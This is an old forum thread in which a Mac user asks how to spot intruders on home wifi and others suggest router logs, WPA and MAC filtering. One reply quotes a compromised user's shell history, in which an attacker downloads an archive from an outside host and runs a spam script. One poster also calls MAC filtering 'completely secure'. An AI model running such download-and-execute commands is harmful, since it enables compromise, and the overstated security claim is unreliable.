Intruder Alert!
December 22, 2005 11:09 AM   Subscribe

Is there any way to monitor the users or traffic on my wireless home network?

I'm running Airport Extreme, with an Airport Express bridge on my Mac OS 10.4. My network is password protected and encrypted, but there have been some funny goings-on that make me wonder if an intruder has gained access. Is there a utility on Mac OSX that can tell me who is logged on to my network? Also, what are some of the other precautions I can take to prevent unwarrented access to my wifi?
posted by slogger to Computers & Internet (7 answers total)
 
#1: your AP should have a combination of a DHCP table, traffic logs, and other features that track this (not your computer per se). I don't know the Airport AP feature set.

#2: it would really help to at least give a few details of the "funny goings-on" if you're going to take the time to post a question.

#3: the best you should do is to MAC filter, require WPA encryption, and don't broadcast your SSID. the former and latter are no better than hook and eye locks on a door, though, to a determined guest. you can do all kinds of other fancy tricks like having a captive OpenBSD authpf portal, but that's way beyond necessary for a home setup.
posted by kcm at 11:13 AM on December 22, 2005


Well if you think something fishy is going on, you can start by changing your WPA password. If someone did break into your network, this would force them to do it again. When you say something fishy is going on, what do you mean? You can check the DHCP client tables on your router, which would tell you who the router has assigned an IP address too. That might point out extra people. If they are setting an IP themselves, you can try turning on logging on the router, and seeing if packets are being sent by computers that aren't yours.
posted by chunking express at 11:14 AM on December 22, 2005


Response by poster: Sorry, I should have been more specific. Some of the funny goings-on include:
- Odd lapses in service, especially during times of day (or night) when traffic spikes seem highly unlikely
- Spam that has my name, or names from people in my address book (the oddest one of late "myname@mydomain.com@otherdomain.com")
- Getting a system message from AIM when not at home telling me my account in logged on at more than one location (usually 3 locations), and my home computer is *definitely* logged out/shut down

I have changed my WPA password a couple of times, including "safe" passwords with lots of upper and lower case letters and numbers. There have been some other stange events too, but the above three are what bothers me most.
posted by slogger at 11:24 AM on December 22, 2005


It is possible that some malware got installed on your OS X machine. Are the passwords on your OS X user accounts non-obvious?

There was a report at Macintouch (which I'm unable to find at the moment) by someone whose OS X machine was compromised. Someone had installed a script that was sending out large volumes of spam.
posted by alms at 11:39 AM on December 22, 2005


OK, here's the report. There was a bunch of follow-up discussion. Unfortunately, I can't link to it because the Macintouch search function doesn't yield pages with unique URLs. But if you go to the Macintouch News Database Search and search for combinations of SSH, Security, Password, and Villeneuve, you'll find it.

Much to my horror, I awoke on the weekend to an e-mail from my service provider which started with:

"Recently we have had complaints of spam coming from your connection."

My wife had complained last week that the computer at home had seemed a bit slow. I rebooted it, and it seemed fine immediately afterwards.
Now I took immediate action, sent an email indicating it was unintentional and I'd take care of it immediately. I pulled the network cable and proceeded to see what had happened.
In a nutshell, about a year ago I'd played around with fast user switching. I'd created an account with the userid of "lisa" and a password of "lisa". Ok, not too swift, but it was convenient for a test. I'd forgotten about it. When I looked in the account's .bash_history file, I found stuff like:

...
curl -O haq.sytes.net/sex.zip
ls
unzip sex.zip
rm -rf sex.zip
cd sex
ls
pico users
chmod +x sendeb.pl
./sendeb.pl
passwd
...

So clearly the person had logged into this not secure, yet still non-admin account and was running scripts. Likely they had gotten in via ssh, since I had the port open so I could do remote maintenance from my office if the need arose.
Checking the /var/log/mail.log (one of the archives), I found that on October 30th it had sent out over 500,000 eBay spam messages.
Just a warning .... make sure you use secure/difficult to guess passwords. ie: Don't use "guest, guest", or name name userid/password pairs.
Mac OS X is very secure, but not if you leave the doors unlocked and the keys in the ignition.
posted by alms at 11:52 AM on December 22, 2005


I'm with alms on this one, this sounds more like your machine itself may be compromised rather than your AP. Can you turn off your wireless network for a few days (run a long CAT5 cable or something) and see if the wackiness subsides?

Sometimes crappy internet service is just....crappy internet service.

The AIM thing would make me very suspicious, though.
posted by popechunk at 1:48 PM on December 22, 2005


I don't know if your router supports it, but it is possible to limit the access to an access point by MAC address (hardware identification code) on most hardware. That's how I keep my network completely secure.

Of course, they could spoof your MAC, but this is highly unlikely. WPA + MAC limits should be enough to keep the baddies out.
posted by mr.dan at 7:38 PM on December 22, 2005


« Older Need help starting a Real Estate Corporation   |   Rip audio from WMV Newer »
This thread is closed to new comments.


Tags

Share